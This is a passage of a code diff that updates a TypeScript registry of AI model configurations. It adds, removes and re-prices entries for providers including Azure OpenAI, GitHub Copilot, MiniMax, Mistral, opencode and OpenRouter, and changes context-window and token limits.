-			api: "anthropic-vertex",
-			provider: "anthropic-vertex",
-			baseUrl: "https://us-central1-aiplatform.googleapis.com",
-			reasoning: true,
-			input: ["text", "image"],
-			cost: {
-				input: 3,
-				output: 15,
-				cacheRead: 0.3,
-				cacheWrite: 3.75,
-			},
-			contextWindow: 200000,
-			maxTokens: 64000,
-		} satisfies Model<"anthropic-vertex">,
-		"claude-opus-4-5@20251101": {
-			id: "claude-opus-4-5@20251101",
-			name: "Claude Opus 4.5 (Vertex)",
-			api: "anthropic-vertex",
-			provider: "anthropic-vertex",
-			baseUrl: "https://us-central1-aiplatform.googleapis.com",
-			reasoning: true,
-			input: ["text", "image"],
-			cost: {
-				input: 15,
-				output: 75,
-				cacheRead: 1.5,
-				cacheWrite: 18.75,
-			},
-			contextWindow: 200000,
-			maxTokens: 32000,
-		} satisfies Model<"anthropic-vertex">,
-		"claude-opus-4-1@20250805": {
-			id: "claude-opus-4-1@20250805",
-			name: "Claude Opus 4.1 (Vertex)",
-			api: "anthropic-vertex",
-			provider: "anthropic-vertex",
-			baseUrl: "https://us-central1-aiplatform.googleapis.com",
-			reasoning: true,
-			input: ["text", "image"],
-			cost: {
-				input: 15,
-				output: 75,
-				cacheRead: 1.5,
-				cacheWrite: 18.75,
-			},
-			contextWindow: 200000,
-			maxTokens: 32000,
-		} satisfies Model<"anthropic-vertex">,
-		"claude-opus-4@20250514": {
-			id: "claude-opus-4@20250514",
-			name: "Claude Opus 4 (Vertex)",
-			api: "anthropic-vertex",
-			provider: "anthropic-vertex",
-			baseUrl: "https://us-central1-aiplatform.googleapis.com",
-			reasoning: true,
-			input: ["text", "image"],
-			cost: {
-				input: 15,
-				output: 75,
-				cacheRead: 1.5,
-				cacheWrite: 18.75,
-			},
-			contextWindow: 200000,
-			maxTokens: 32000,
-		} satisfies Model<"anthropic-vertex">,
-		"claude-haiku-4-5@20251001": {
-			id: "claude-haiku-4-5@20251001",
-			name: "Claude Haiku 4.5 (Vertex)",
-			api: "anthropic-vertex",
-			provider: "anthropic-vertex",
-			baseUrl: "https://us-central1-aiplatform.googleapis.com",
-			reasoning: false,
-			input: ["text", "image"],
-			cost: {
-				input: 0.8,
-				output: 4,
-				cacheRead: 0.08,
-				cacheWrite: 1,
-			},
-			contextWindow: 200000,
-			maxTokens: 8192,
-		} satisfies Model<"anthropic-vertex">,
-	},
 	"azure-openai-responses": {
 		"codex-mini-latest": {
 			id: "codex-mini-latest",
@@ -2493,6 +2304,40 @@ export const MODELS = {
 			contextWindow: 272000,
 			maxTokens: 128000,
 		} satisfies Model<"azure-openai-responses">,
+		"gpt-5.4-mini": {
+			id: "gpt-5.4-mini",
+			name: "GPT-5.4 mini",
+			api: "azure-openai-responses",
+			provider: "azure-openai-responses",
+			baseUrl: "",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0.75,
+				output: 4.5,
+				cacheRead: 0.075,
+				cacheWrite: 0,
+			},
+			contextWindow: 400000,
+			maxTokens: 128000,
+		} satisfies Model<"azure-openai-responses">,
+		"gpt-5.4-nano": {
+			id: "gpt-5.4-nano",
+			name: "GPT-5.4 nano",
+			api: "azure-openai-responses",
+			provider: "azure-openai-responses",
+			baseUrl: "",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0.2,
+				output: 1.25,
+				cacheRead: 0.02,
+				cacheWrite: 0,
+			},
+			contextWindow: 400000,
+			maxTokens: 128000,
+		} satisfies Model<"azure-openai-responses">,
 		"gpt-5.4-pro": {
 			id: "gpt-5.4-pro",
 			name: "GPT-5.4 Pro",
@@ -2733,7 +2578,7 @@ export const MODELS = {
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 128000,
+			contextWindow: 144000,
 			maxTokens: 32000,
 		} satisfies Model<"anthropic-messages">,
 		"claude-opus-4.5": {
@@ -2751,7 +2596,7 @@ export const MODELS = {
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 128000,
+			contextWindow: 160000,
 			maxTokens: 32000,
 		} satisfies Model<"anthropic-messages">,
 		"claude-opus-4.6": {
@@ -2769,7 +2614,7 @@ export const MODELS = {
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 128000,
+			contextWindow: 144000,
 			maxTokens: 64000,
 		} satisfies Model<"anthropic-messages">,
 		"claude-sonnet-4": {
@@ -2787,7 +2632,7 @@ export const MODELS = {
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 128000,
+			contextWindow: 216000,
 			maxTokens: 16000,
 		} satisfies Model<"anthropic-messages">,
 		"claude-sonnet-4.5": {
@@ -2805,7 +2650,7 @@ export const MODELS = {
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 128000,
+			contextWindow: 144000,
 			maxTokens: 32000,
 		} satisfies Model<"anthropic-messages">,
 		"claude-sonnet-4.6": {
@@ -2823,7 +2668,7 @@ export const MODELS = {
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 128000,
+			contextWindow: 200000,
 			maxTokens: 32000,
 		} satisfies Model<"anthropic-messages">,
 		"gemini-2.5-pro": {
@@ -2918,7 +2763,7 @@ export const MODELS = {
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 64000,
+			contextWindow: 128000,
 			maxTokens: 16384,
 		} satisfies Model<"openai-completions">,
 		"gpt-4o": {
@@ -2937,8 +2782,8 @@ export const MODELS = {
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 64000,
-			maxTokens: 16384,
+			contextWindow: 128000,
+			maxTokens: 4096,
 		} satisfies Model<"openai-completions">,
 		"gpt-5": {
 			id: "gpt-5",
@@ -2973,7 +2818,7 @@ export const MODELS = {
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 128000,
+			contextWindow: 264000,
 			maxTokens: 64000,
 		} satisfies Model<"openai-responses">,
 		"gpt-5.1": {
@@ -2991,7 +2836,7 @@ export const MODELS = {
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 128000,
+			contextWindow: 264000,
 			maxTokens: 64000,
 		} satisfies Model<"openai-responses">,
 		"gpt-5.1-codex": {
@@ -3009,7 +2854,7 @@ export const MODELS = {
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 128000,
+			contextWindow: 400000,
 			maxTokens: 128000,
 		} satisfies Model<"openai-responses">,
 		"gpt-5.1-codex-max": {
@@ -3027,7 +2872,7 @@ export const MODELS = {
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 128000,
+			contextWindow: 400000,
 			maxTokens: 128000,
 		} satisfies Model<"openai-responses">,
 		"gpt-5.1-codex-mini": {
@@ -3045,7 +2890,7 @@ export const MODELS = {
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 128000,
+			contextWindow: 400000,
 			maxTokens: 128000,
 		} satisfies Model<"openai-responses">,
 		"gpt-5.2": {
@@ -3063,7 +2908,7 @@ export const MODELS = {
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 128000,
+			contextWindow: 264000,
 			maxTokens: 64000,
 		} satisfies Model<"openai-responses">,
 		"gpt-5.2-codex": {
@@ -3081,7 +2926,7 @@ export const MODELS = {
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 272000,
+			contextWindow: 400000,
 			maxTokens: 128000,
 		} satisfies Model<"openai-responses">,
 		"gpt-5.3-codex": {
@@ -3120,6 +2965,24 @@ export const MODELS = {
 			contextWindow: 400000,
 			maxTokens: 128000,
 		} satisfies Model<"openai-responses">,
+		"gpt-5.4-mini": {
+			id: "gpt-5.4-mini",
+			name: "GPT-5.4 mini",
+			api: "openai-responses",
+			provider: "github-copilot",
+			baseUrl: "https://api.individual.githubcopilot.com",
+			headers: {"User-Agent":"GitHubCopilotChat/0.35.0","Editor-Version":"vscode/1.107.0","Editor-Plugin-Version":"copilot-chat/0.35.0","Copilot-Integration-Id":"vscode-chat"},
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0,
+				output: 0,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 400000,
+			maxTokens: 128000,
+		} satisfies Model<"openai-responses">,
 		"grok-code-fast-1": {
 			id: "grok-code-fast-1",
 			name: "Grok Code Fast 1",
@@ -3439,10 +3302,10 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text", "image"],
 			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
+				input: 0.25,
+				output: 1.5,
+				cacheRead: 0.025,
+				cacheWrite: 1,
 			},
 			contextWindow: 1048576,
 			maxTokens: 65536,
@@ -4703,6 +4566,40 @@ export const MODELS = {
 			contextWindow: 204800,
 			maxTokens: 131072,
 		} satisfies Model<"anthropic-messages">,
+		"MiniMax-M2.7": {
+			id: "MiniMax-M2.7",
+			name: "MiniMax-M2.7",
+			api: "anthropic-messages",
+			provider: "minimax",
+			baseUrl: "https://api.minimax.io/anthropic",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0.3,
+				output: 1.2,
+				cacheRead: 0.06,
+				cacheWrite: 0.375,
+			},
+			contextWindow: 204800,
+			maxTokens: 131072,
+		} satisfies Model<"anthropic-messages">,
+		"MiniMax-M2.7-highspeed": {
+			id: "MiniMax-M2.7-highspeed",
+			name: "MiniMax-M2.7-highspeed",
+			api: "anthropic-messages",
+			provider: "minimax",
+			baseUrl: "https://api.minimax.io/anthropic",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0.6,
+				output: 2.4,
+				cacheRead: 0.06,
+				cacheWrite: 0.375,
+			},
+			contextWindow: 204800,
+			maxTokens: 131072,
+		} satisfies Model<"anthropic-messages">,
 	},
 	"minimax-cn": {
 		"MiniMax-M2": {
@@ -4773,11 +4670,45 @@ export const MODELS = {
 			contextWindow: 204800,
 			maxTokens: 131072,
 		} satisfies Model<"anthropic-messages">,
+		"MiniMax-M2.7": {
+			id: "MiniMax-M2.7",
+			name: "MiniMax-M2.7",
+			api: "anthropic-messages",
+			provider: "minimax-cn",
+			baseUrl: "https://api.minimaxi.com/anthropic",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0.3,
+				output: 1.2,
+				cacheRead: 0.06,
+				cacheWrite: 0.375,
+			},
+			contextWindow: 204800,
+			maxTokens: 131072,
+		} satisfies Model<"anthropic-messages">,
+		"MiniMax-M2.7-highspeed": {
+			id: "MiniMax-M2.7-highspeed",
+			name: "MiniMax-M2.7-highspeed",
+			api: "anthropic-messages",
+			provider: "minimax-cn",
+			baseUrl: "https://api.minimaxi.com/anthropic",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0.6,
+				output: 2.4,
+				cacheRead: 0.06,
+				cacheWrite: 0.375,
+			},
+			contextWindow: 204800,
+			maxTokens: 131072,
+		} satisfies Model<"anthropic-messages">,
 	},
 	"mistral": {
 		"codestral-latest": {
 			id: "codestral-latest",
-			name: "Codestral",
+			name: "Codestral (latest)",
 			api: "mistral-conversations",
 			provider: "mistral",
 			baseUrl: "https://api.mistral.ai",
@@ -4828,7 +4759,7 @@ export const MODELS = {
 		} satisfies Model<"mistral-conversations">,
 		"devstral-medium-latest": {
 			id: "devstral-medium-latest",
-			name: "Devstral 2",
+			name: "Devstral 2 (latest)",
 			api: "mistral-conversations",
 			provider: "mistral",
 			baseUrl: "https://api.mistral.ai",
@@ -4896,7 +4827,7 @@ export const MODELS = {
 		} satisfies Model<"mistral-conversations">,
 		"magistral-medium-latest": {
 			id: "magistral-medium-latest",
-			name: "Magistral Medium",
+			name: "Magistral Medium (latest)",
 			api: "mistral-conversations",
 			provider: "mistral",
 			baseUrl: "https://api.mistral.ai",
@@ -4930,7 +4861,7 @@ export const MODELS = {
 		} satisfies Model<"mistral-conversations">,
 		"ministral-3b-latest": {
 			id: "ministral-3b-latest",
-			name: "Ministral 3B",
+			name: "Ministral 3B (latest)",
 			api: "mistral-conversations",
 			provider: "mistral",
 			baseUrl: "https://api.mistral.ai",
@@ -4947,7 +4878,7 @@ export const MODELS = {
 		} satisfies Model<"mistral-conversations">,
 		"ministral-8b-latest": {
 			id: "ministral-8b-latest",
-			name: "Ministral 8B",
+			name: "Ministral 8B (latest)",
 			api: "mistral-conversations",
 			provider: "mistral",
 			baseUrl: "https://api.mistral.ai",
@@ -4998,7 +4929,7 @@ export const MODELS = {
 		} satisfies Model<"mistral-conversations">,
 		"mistral-large-latest": {
 			id: "mistral-large-latest",
-			name: "Mistral Large",
+			name: "Mistral Large (latest)",
 			api: "mistral-conversations",
 			provider: "mistral",
 			baseUrl: "https://api.mistral.ai",
@@ -5049,7 +4980,7 @@ export const MODELS = {
 		} satisfies Model<"mistral-conversations">,
 		"mistral-medium-latest": {
 			id: "mistral-medium-latest",
-			name: "Mistral Medium",
+			name: "Mistral Medium (latest)",
 			api: "mistral-conversations",
 			provider: "mistral",
 			baseUrl: "https://api.mistral.ai",
@@ -5100,7 +5031,7 @@ export const MODELS = {
 		} satisfies Model<"mistral-conversations">,
 		"mistral-small-latest": {
 			id: "mistral-small-latest",
-			name: "Mistral Small",
+			name: "Mistral Small (latest)",
 			api: "mistral-conversations",
 			provider: "mistral",
 			baseUrl: "https://api.mistral.ai",
@@ -5185,7 +5116,7 @@ export const MODELS = {
 		} satisfies Model<"mistral-conversations">,
 		"pixtral-large-latest": {
 			id: "pixtral-large-latest",
-			name: "Pixtral Large",
+			name: "Pixtral Large (latest)",
 			api: "mistral-conversations",
 			provider: "mistral",
 			baseUrl: "https://api.mistral.ai",
@@ -5695,6 +5626,40 @@ export const MODELS = {
 			contextWindow: 272000,
 			maxTokens: 128000,
 		} satisfies Model<"openai-responses">,
+		"gpt-5.4-mini": {
+			id: "gpt-5.4-mini",
+			name: "GPT-5.4 mini",
+			api: "openai-responses",
+			provider: "openai",
+			baseUrl: "https://api.openai.com/v1",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0.75,
+				output: 4.5,
+				cacheRead: 0.075,
+				cacheWrite: 0,
+			},
+			contextWindow: 400000,
+			maxTokens: 128000,
+		} satisfies Model<"openai-responses">,
+		"gpt-5.4-nano": {
+			id: "gpt-5.4-nano",
+			name: "GPT-5.4 nano",
+			api: "openai-responses",
+			provider: "openai",
+			baseUrl: "https://api.openai.com/v1",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0.2,
+				output: 1.25,
+				cacheRead: 0.02,
+				cacheWrite: 0,
+			},
+			contextWindow: 400000,
+			maxTokens: 128000,
+		} satisfies Model<"openai-responses">,
 		"gpt-5.4-pro": {
 			id: "gpt-5.4-pro",
 			name: "GPT-5.4 Pro",
@@ -6087,7 +6052,7 @@ export const MODELS = {
 				cacheRead: 0.5,
 				cacheWrite: 6.25,
 			},
-			contextWindow: 200000,
+			contextWindow: 1000000,
 			maxTokens: 128000,
 		} satisfies Model<"anthropic-messages">,
 		"claude-sonnet-4": {
@@ -6158,23 +6123,6 @@ export const MODELS = {
 			contextWindow: 1048576,
 			maxTokens: 65536,
 		} satisfies Model<"google-generative-ai">,
-		"gemini-3-pro": {
-			id: "gemini-3-pro",
-			name: "Gemini 3 Pro",
-			api: "google-generative-ai",
-			provider: "opencode",
-			baseUrl: "https://opencode.ai/zen/v1",
-			reasoning: true,
-			input: ["text", "image"],
-			cost: {
-				input: 2,
-				output: 12,
-				cacheRead: 0.2,
-				cacheWrite: 0,
-			},
-			contextWindow: 1048576,
-			maxTokens: 65536,
-		} satisfies Model<"google-generative-ai">,
 		"gemini-3.1-pro": {
 			id: "gemini-3.1-pro",
 			name: "Gemini 3.1 Pro Preview",
@@ -6192,40 +6140,6 @@ export const MODELS = {
 			contextWindow: 1048576,
 			maxTokens: 65536,
 		} satisfies Model<"google-generative-ai">,
-		"glm-4.6": {
-			id: "glm-4.6",
-			name: "GLM-4.6",
-			api: "openai-completions",
-			provider: "opencode",
-			baseUrl: "https://opencode.ai/zen/v1",
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0.6,
-				output: 2.2,
-				cacheRead: 0.1,
-				cacheWrite: 0,
-			},
-			contextWindow: 204800,
-			maxTokens: 131072,
-		} satisfies Model<"openai-completions">,
-		"glm-4.7": {
-			id: "glm-4.7",
-			name: "GLM-4.7",
-			api: "openai-completions",
-			provider: "opencode",
-			baseUrl: "https://opencode.ai/zen/v1",
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0.6,
-				output: 2.2,
-				cacheRead: 0.1,
-				cacheWrite: 0,
-			},
-			contextWindow: 204800,
-			maxTokens: 131072,
-		} satisfies Model<"openai-completions">,
 		"glm-5": {
 			id: "glm-5",
 			name: "GLM-5",
@@ -6430,6 +6344,40 @@ export const MODELS = {
 			contextWindow: 272000,
 			maxTokens: 128000,
 		} satisfies Model<"openai-responses">,
+		"gpt-5.4-mini": {
+			id: "gpt-5.4-mini",
+			name: "GPT-5.4 Mini",
+			api: "openai-responses",
+			provider: "opencode",
+			baseUrl: "https://opencode.ai/zen/v1",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0.75,
+				output: 4.5,
+				cacheRead: 0.075,
+				cacheWrite: 0,
+			},
+			contextWindow: 400000,
+			maxTokens: 128000,
+		} satisfies Model<"openai-responses">,
+		"gpt-5.4-nano": {
+			id: "gpt-5.4-nano",
+			name: "GPT-5.4 Nano",
+			api: "openai-responses",
+			provider: "opencode",
+			baseUrl: "https://opencode.ai/zen/v1",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0.2,
+				output: 1.25,
+				cacheRead: 0.02,
+				cacheWrite: 0,
+			},
+			contextWindow: 400000,
+			maxTokens: 128000,
+		} satisfies Model<"openai-responses">,
 		"gpt-5.4-pro": {
 			id: "gpt-5.4-pro",
 			name: "GPT-5.4 Pro",
@@ -6464,22 +6412,39 @@ export const MODELS = {
 			contextWindow: 262144,
 			maxTokens: 65536,
 		} satisfies Model<"openai-completions">,
-		"minimax-m2.1": {
-			id: "minimax-m2.1",
-			name: "MiniMax M2.1",
+		"mimo-v2-omni-free": {
+			id: "mimo-v2-omni-free",
+			name: "MiMo V2 Omni Free",
+			api: "openai-completions",
+			provider: "opencode",
+			baseUrl: "https://opencode.ai/zen/v1",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0,
+				output: 0,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 262144,
+			maxTokens: 64000,
+		} satisfies Model<"openai-completions">,
+		"mimo-v2-pro-free": {
+			id: "mimo-v2-pro-free",
+			name: "MiMo V2 Pro Free",
 			api: "openai-completions",
 			provider: "opencode",
 			baseUrl: "https://opencode.ai/zen/v1",
 			reasoning: true,
 			input: ["text"],
 			cost: {
-				input: 0.3,
-				output: 1.2,
-				cacheRead: 0.1,
+				input: 0,
+				output: 0,
+				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 204800,
-			maxTokens: 131072,
+			contextWindow: 1048576,
+			maxTokens: 64000,
 		} satisfies Model<"openai-completions">,
 		"minimax-m2.5": {
 			id: "minimax-m2.5",
@@ -6515,6 +6480,23 @@ export const MODELS = {
 			contextWindow: 204800,
 			maxTokens: 131072,
 		} satisfies Model<"anthropic-messages">,
+		"nemotron-3-super-free": {
+			id: "nemotron-3-super-free",
+			name: "Nemotron 3 Super Free",
+			api: "openai-completions",
+			provider: "opencode",
+			baseUrl: "https://opencode.ai/zen/v1",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0,
+				output: 0,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 1000000,
+			maxTokens: 128000,
+		} satisfies Model<"openai-completions">,
 	},
 	"opencode-go": {
 		"glm-5": {
@@ -6568,6 +6550,23 @@ export const MODELS = {
 			contextWindow: 204800,
 			maxTokens: 131072,
 		} satisfies Model<"anthropic-messages">,
+		"minimax-m2.7": {
+			id: "minimax-m2.7",
+			name: "MiniMax M2.7",
+			api: "anthropic-messages",
+			provider: "opencode-go",
+			baseUrl: "https://opencode.ai/zen/go",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0.3,
+				output: 1.2,
+				cacheRead: 0.06,
+				cacheWrite: 0,
+			},
+			contextWindow: 204800,
+			maxTokens: 131072,
+		} satisfies Model<"anthropic-messages">,
 	},
 	"openrouter": {
 		"ai21/jamba-large-1.7": {
@@ -7080,6 +7079,23 @@ export const MODELS = {
 			contextWindow: 262144,
 			maxTokens: 32768,
 		} satisfies Model<"openai-completions">,
+		"bytedance-seed/seed-2.0-lite": {
+			id: "bytedance-seed/seed-2.0-lite",
+			name: "ByteDance Seed: Seed-2.0-Lite",
+			api: "openai-completions",
+			provider: "openrouter",
+			baseUrl: "https://openrouter.ai/api/v1",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0.25,
+				output: 2,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 262144,
+			maxTokens: 131072,
+		} satisfies Model<"openai-completions">,
 		"bytedance-seed/seed-2.0-mini": {
 			id: "bytedance-seed/seed-2.0-mini",
 			name: "ByteDance Seed: Seed-2.0-Mini",
@@ -7159,11 +7175,11 @@ export const MODELS = {
 			cost: {
 				input: 0.19999999999999998,
 				output: 0.77,
-				cacheRead: 0.13,
+				cacheRead: 0.135,
 				cacheWrite: 0,
 			},
 			contextWindow: 163840,
-			maxTokens: 163840,
+			maxTokens: 4096,
 		} satisfies Model<"openai-completions">,
 		"deepseek/deepseek-chat-v3.1": {
 			id: "deepseek/deepseek-chat-v3.1",
@@ -7233,23 +7249,6 @@ export const MODELS = {
 			contextWindow: 163840,
 			maxTokens: 4096,
 		} satisfies Model<"openai-completions">,
-		"deepseek/deepseek-v3.1-terminus:exacto": {
-			id: "deepseek/deepseek-v3.1-terminus:exacto",
-			name: "DeepSeek: DeepSeek V3.1 Terminus (exacto)",
-			api: "openai-completions",
-			provider: "openrouter",
-			baseUrl: "https://openrouter.ai/api/v1",
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0.21,
-				output: 0.7899999999999999,
-				cacheRead: 0.16799999999999998,
-				cacheWrite: 0,
-			},
-			contextWindow: 163840,
-			maxTokens: 4096,
-		} satisfies Model<"openai-completions">,
 		"deepseek/deepseek-v3.2": {
 			id: "deepseek/deepseek-v3.2",
 			name: "DeepSeek: DeepSeek V3.2",
@@ -7259,13 +7258,13 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text"],
 			cost: {
-				input: 0.25,
-				output: 0.39999999999999997,
-				cacheRead: 0,
+				input: 0.26,
+				output: 0.38,
+				cacheRead: 0.13,
 				cacheWrite: 0,
 			},
 			contextWindow: 163840,
-			maxTokens: 65536,
+			maxTokens: 4096,
 		} satisfies Model<"openai-completions">,
 		"deepseek/deepseek-v3.2-exp": {
 			id: "deepseek/deepseek-v3.2-exp",
@@ -7522,40 +7521,6 @@ export const MODELS = {
 			contextWindow: 1048576,
 			maxTokens: 65536,
 		} satisfies Model<"openai-completions">,
-		"google/gemma-3-27b-it": {
-			id: "google/gemma-3-27b-it",
-			name: "Google: Gemma 3 27B",
-			api: "openai-completions",
-			provider: "openrouter",
-			baseUrl: "https://openrouter.ai/api/v1",
-			reasoning: false,
-			input: ["text", "image"],
-			cost: {
-				input: 0.04,
-				output: 0.15,
-				cacheRead: 0.02,
-				cacheWrite: 0,
-			},
-			contextWindow: 128000,
-			maxTokens: 65536,
-		} satisfies Model<"openai-completions">,
-		"google/gemma-3-27b-it:free": {
-			id: "google/gemma-3-27b-it:free",
-			name: "Google: Gemma 3 27B (free)",
-			api: "openai-completions",
-			provider: "openrouter",
-			baseUrl: "https://openrouter.ai/api/v1",
-			reasoning: false,
-			input: ["text", "image"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 131072,
-			maxTokens: 8192,
-		} satisfies Model<"openai-completions">,
 		"inception/mercury": {
 			id: "inception/mercury",
 			name: "Inception: Mercury",
@@ -7658,23 +7623,6 @@ export const MODELS = {
 			contextWindow: 8192,
 			maxTokens: 16384,
 		} satisfies Model<"openai-completions">,
-		"meta-llama/llama-3.1-405b-instruct": {
-			id: "meta-llama/llama-3.1-405b-instruct",
-			name: "Meta: Llama 3.1 405B Instruct",
-			api: "openai-completions",
-			provider: "openrouter",
-			baseUrl: "https://openrouter.ai/api/v1",
-			reasoning: false,
-			input: ["text"],
-			cost: {
-				input: 4,
-				output: 4,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 131000,
-			maxTokens: 4096,
-		} satisfies Model<"openai-completions">,
 		"meta-llama/llama-3.1-70b-instruct": {
 			id: "meta-llama/llama-3.1-70b-instruct",
 			name: "Meta: Llama 3.1 70B Instruct",
@@ -7740,8 +7688,8 @@ export const MODELS = {
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 128000,
-			maxTokens: 128000,
+			contextWindow: 65536,
+			maxTokens: 4096,
 		} satisfies Model<"openai-completions">,
 		"meta-llama/llama-4-maverick": {
 			id: "meta-llama/llama-4-maverick",
@@ -7837,14 +7785,48 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text"],
 			cost: {
-				input: 0.295,
-				output: 1.2,
-				cacheRead: 0.03,
+				input: 0.19999999999999998,
+				output: 1.17,
+				cacheRead: 0.09999999999999999,
+				cacheWrite: 0,
+			},
+			contextWindow: 196608,
+			maxTokens: 65536,
+		} satisfies Model<"openai-completions">,
+		"minimax/minimax-m2.5:free": {
+			id: "minimax/minimax-m2.5:free",
+			name: "MiniMax: MiniMax M2.5 (free)",
+			api: "openai-completions",
+			provider: "openrouter",
+			baseUrl: "https://openrouter.ai/api/v1",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0,
+				output: 0,
+				cacheRead: 0,
 				cacheWrite: 0,
 			},
 			contextWindow: 196608,
 			maxTokens: 196608,
 		} satisfies Model<"openai-completions">,
+		"minimax/minimax-m2.7": {
+			id: "minimax/minimax-m2.7",
+			name: "MiniMax: MiniMax M2.7",
+			api: "openai-completions",
+			provider: "openrouter",
+			baseUrl: "https://openrouter.ai/api/v1",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0.3,
+				output: 1.2,
+				cacheRead: 0.06,
+				cacheWrite: 0,
+			},
+			contextWindow: 204800,
+			maxTokens: 131072,
+		} satisfies Model<"openai-completions">,
 		"mistralai/codestral-2508": {
 			id: "mistralai/codestral-2508",
 			name: "Mistral: Codestral 2508",
@@ -7856,7 +7838,7 @@ export const MODELS = {
 			cost: {
 				input: 0.3,
 				output: 0.8999999999999999,
-				cacheRead: 0,
+				cacheRead: 0.03,
 				cacheWrite: 0,
 			},
 			contextWindow: 256000,
@@ -7873,7 +7855,7 @@ export const MODELS = {
 			cost: {
 				input: 0.39999999999999997,
 				output: 2,
-				cacheRead: 0,
+				cacheRead: 0.04,
 				cacheWrite: 0,
 			},
 			contextWindow: 262144,
@@ -7890,7 +7872,7 @@ export const MODELS = {
 			cost: {
 				input: 0.39999999999999997,
 				output: 2,
-				cacheRead: 0,
+				cacheRead: 0.04,
 				cacheWrite: 0,
 			},
 			contextWindow: 131072,
@@ -7907,7 +7889,7 @@ export const MODELS = {
 			cost: {
 				input: 0.09999999999999999,
 				output: 0.3,
-				cacheRead: 0,
+				cacheRead: 0.01,
 				cacheWrite: 0,
 			},
 			contextWindow: 131072,
@@ -7924,7 +7906,7 @@ export const MODELS = {
 			cost: {
 				input: 0.19999999999999998,
 				output: 0.19999999999999998,
-				cacheRead: 0,
+				cacheRead: 0.02,
 				cacheWrite: 0,
 			},
 			contextWindow: 262144,
@@ -7941,7 +7923,7 @@ export const MODELS = {
 			cost: {
 				input: 0.09999999999999999,
 				output: 0.09999999999999999,
-				cacheRead: 0,
+				cacheRead: 0.01,
 				cacheWrite: 0,
 			},
 			contextWindow: 131072,
@@ -7958,7 +7940,7 @@ export const MODELS = {
 			cost: {
 				input: 0.15,
 				output: 0.15,
-				cacheRead: 0,
+				cacheRead: 0.015,
 				cacheWrite: 0,
 			},
 			contextWindow: 262144,
@@ -7975,7 +7957,7 @@ export const MODELS = {
 			cost: {
 				input: 2,
 				output: 6,
-				cacheRead: 0,
+				cacheRead: 0.19999999999999998,
 				cacheWrite: 0,
 			},
 			contextWindow: 128000,
@@ -7992,7 +7974,7 @@ export const MODELS = {
 			cost: {
 				input: 2,
 				output: 6,
-				cacheRead: 0,
+				cacheRead: 0.19999999999999998,
 				cacheWrite: 0,
 			},
 			contextWindow: 131072,
@@ -8009,7 +7991,7 @@ export const MODELS = {
 			cost: {
 				input: 2,
 				output: 6,
-				cacheRead: 0,
+				cacheRead: 0.19999999999999998,
 				cacheWrite: 0,
 			},
 			contextWindow: 131072,
@@ -8026,7 +8008,7 @@ export const MODELS = {
 			cost: {
 				input: 0.5,
 				output: 1.5,
-				cacheRead: 0,
+				cacheRead: 0.049999999999999996,
 				cacheWrite: 0,
 			},
 			contextWindow: 262144,
@@ -8043,7 +8025,7 @@ export const MODELS = {
 			cost: {
 				input: 0.39999999999999997,
 				output: 2,
-				cacheRead: 0,
+				cacheRead: 0.04,
 				cacheWrite: 0,
 			},
 			contextWindow: 131072,
@@ -8060,7 +8042,7 @@ export const MODELS = {
 			cost: {
 				input: 0.39999999999999997,
 				output: 2,
-				cacheRead: 0,
+				cacheRead: 0.04,
 				cacheWrite: 0,
 			},
 			contextWindow: 131072,
@@ -8094,7 +8076,7 @@ export const MODELS = {
 			cost: {
 				input: 0.19999999999999998,
 				output: 0.6,
-				cacheRead: 0,
+				cacheRead: 0.02,
